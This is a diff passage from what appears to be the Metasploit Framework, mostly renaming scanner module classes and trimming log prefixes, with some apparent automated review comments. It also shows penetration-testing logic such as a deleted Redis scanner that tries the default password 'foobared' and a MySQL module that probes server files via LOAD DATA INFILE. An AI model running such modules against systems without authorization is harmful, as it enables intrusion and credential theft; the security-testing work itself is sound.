@@ -35,19 +35,19 @@ class Metasploit3 < Msf::Auxiliary end def run_host(target_host) - vprint_status("#{peer} - Sending RMI Header...") + vprint_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end # Determine if the instance allows remote class loading - vprint_status("#{peer} - Sending RMI Call...") + vprint_status("Sending RMI Call...") jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar' jar_url = "file:RMIClassLoaderSecurityTest/" + jar @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary return_value = recv_return if return_value.nil? - print_error("#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected") + print_error("Failed to send RMI Call, anyway JAVA RMI Endpoint detected") report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "") return end diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index 44f949da95..8eb2ee4019 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 39a58fb004..110244aa82 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report 
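Review bot: The `return_value.nil?` branch in the second java_rmi_server.rb hunk returns right after `report_service` without calling `disconnect`, while the `ack.nil?` branch in the first hunk disconnects before its `return`; unless an `ensure` outside the hunk closes the socket, add `disconnect` before that `return`. That branch also reports a positive detection through `print_error`, and the message reads awkwardly; `print_status("RMI call failed, but a Java RMI endpoint was detected")` would say what was found. `run_host` starts and ends outside both hunks.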
diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb index 9f0c275fd7..8c43197c72 100644 --- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb deleted file mode 100644 index 1dd600d8eb..0000000000 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ /dev/null 
@@ -1,84 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Module::Deprecated
- deprecated(Date.new(2016, 3, 5), 'auxiliary/scanner/redis/redis_server')
- include Msf::Auxiliary::Report
- include Msf::Auxiliary::Scanner
- include Msf::Exploit::Remote::Tcp
-
- def initialize(info={})
- super(update_info(info,
- 'Name' => 'Redis-server Scanner',
- 'Description' => %q{
- This module scans for Redis server. By default Redis has no auth. If auth
- (password only) is used, it is then possible to execute a brute force attack on
- the server. This scanner will find open or password protected Redis servers and
- report back the server information
- },
- 'Author' => [ 'iallison ' ],
- 'License' => MSF_LICENSE
- ))
-
- register_options(
- [
- Opt::RPORT(6379),
- ], self.class)
-
- deregister_options('RHOST')
- end
-
- def run_host(ip)
- print_status("Scanning IP: #{ip.to_s}")
- begin
- pkt = "PING\r\n"
- connect
- sock.put(pkt)
- res = sock.get_once
-
- if res =~ /PONG/
- info = "INFO\r\n"
- sock.put(info)
- data = sock.get_once
- print_status("Redis Server Information #{data}")
- data_sanitized = data.to_s
- elsif res =~ /ERR/
- auth = "AUTH foobared\r\n"
- sock.put(auth)
- data = sock.get_once
- print_status("Response: #{data.chop}")
- if data =~ /\-ERR\sinvalid\spassword/
- print_status("Redis server is using AUTH")
- else
- print_good("Redis server is using the default password of foobared")
- report_note(
- :host => rhost,
- :port => rport,
- :type => 'password',
- :data => 'foobared'
- )
- end
- else
- print_error "#{ip} does not have a Redis server"
- end
-
- report_service(
- :host => rhost,
- :port => rport,
- :name => "redis server",
- :info => data_sanitized
- )
-
- disconnect
-
- rescue ::Exception => e
- print_error "Unable to connect: #{e.to_s}"
- end
- end
-end
diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index e77aaa2c1e..b364568cd3 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index d52870235d..8b9ecfc9cb 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 8c7fa985c9..9e75d30953 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status "#{peer} - SunRPC - Enumerating programs" + vprint_status "SunRPC - Enumerating programs" begin program = 100000 @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end sunrpc_destroy return if maps.empty? - vprint_good("#{peer} - Found #{maps.size} programs available") + vprint_good("Found #{maps.size} programs available") table = Rex::Ui::Text::Table.new( 'Header' => "SunRPC Programs for #{ip}", 
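Review bot: The local `peer = "#{ip}:#{rport}"` kept as the first context line of the sunrpc_portmapper.rb `run_host` hunk has lost both of its visible readers, now that `vprint_status` here and `vprint_good` in the following hunk no longer interpolate it. If nothing later in the method reads it, delete the assignment; it also shadows any `peer` helper the included mixins provide, which is presumably what now supplies the prefix. `run_host` starts and ends outside these hunks, so check the rest of the method before removing it.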
diff --git a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb index 3fbd8b36c1..25bf30368e 100644 --- a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index e8091b4b1b..5240dc8767 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 525441c1c4..711fe24d98 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/msf/msf_rpc_login.rb b/modules/auxiliary/scanner/msf/msf_rpc_login.rb index 1f3100ec96..a6288c472b 100644 --- a/modules/auxiliary/scanner/msf/msf_rpc_login.rb +++ b/modules/auxiliary/scanner/msf/msf_rpc_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index 28cacb64af..485c406829 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb 
+++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 5180dc687f..dd9d13985d 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 6c07f9f3b8..96ff2394cb 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mssql' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index 12078e523a..a15b4936ba 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner 
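Review bot: The `print_error` on the line after the rewritten condition in mssql_hashdump.rb still builds its own `#{rhost}:#{rport} - ` prefix, while the other scanner hunks in this commit strip the hand-written `#{peer} - ` prefix from their messages. If the framework now prefixes scanner output with the peer (inferred from those removals, not visible here), this line would print the address twice; `print_error("Invalid SQL Server credentials")` would match the rest of the change. The same applies to the identical hunk in mssql_schemadump.rb. As a smaller style point, `unless mssql_login_datastore` reads better than `if !mssql_login_datastore`.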
diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 628a8fdb86..d6145d54e0 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index bcb1234c20..03ae86a4bb 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7219f8eab1..651777c43e 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Login...") + vprint_status("Login...") if (not mysql_login_datastore) return 
@@ -53,10 +53,10 @@ class Metasploit3 < Msf::Auxiliary begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary table_exists = (res.size == 1) if !table_exists - vprint_status("#{peer} - Table doesn't exist so creating it") + vprint_status("Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary file.close if !table_exists - vprint_status("#{peer} - Cleaning up the temp table") + vprint_status("Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good("#{peer} - #{dir} is a directory and exists") + print_good("#{dir} is a directory and exists") report_note( :host => rhost, :type => "filesystem.dir", @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", 
@@ -104,15 +104,15 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::ServerError - vprint_warning("#{peer} - #{dir} does not exist") + vprint_warning("#{dir} does not exist") rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return else - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index ce7c378756..001db59de4 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 97658016c6..96df43e074 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mysql' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index ede601b57e..18553d0c99 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index bde7d5c2b7..39d28e1a01 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index 5c21a67f68..c549f03e37 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index ba12f61143..c9e8f5bb7b 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 88aef9dc9b..1469af89cc 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/nessus' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb index e687f70ddf..295fe10f58 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb index 412c93108b..aab6e9f514 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index 64b9befe91..fa88313e53 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index fe990c8685..d1d9130fda 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb 
+++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb index 0953d09cec..85d3d81a91 100644 --- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb +++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index fd2aee0706..aebc979928 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index ba17c40926..a1cc544140 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp 
@@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]), - OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false']) + OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false]) ], self.class) register_advanced_options( [ - OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false']) + OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb index 104e73a527..3c9fd1e670 100644 --- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb +++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index c2d7653db8..ed78121c35 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 900c9b7fad..47e78484c0 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp 
diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 98cb2a0d4c..1da9bb99e7 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index f31ee5f258..1e32c29acd 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index eb4ebbc44a..f83e1350f8 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 9913e40b1c..3e94f7c34e 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index 0d0e0d3916..d4cc0f4256 100644 
--- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index c778ba15ca..15c51b99d2 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index fbf870fb2d..e215288450 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index f72286bd28..87737d307d 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index fa717b7ec0..d96b46579d 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb 
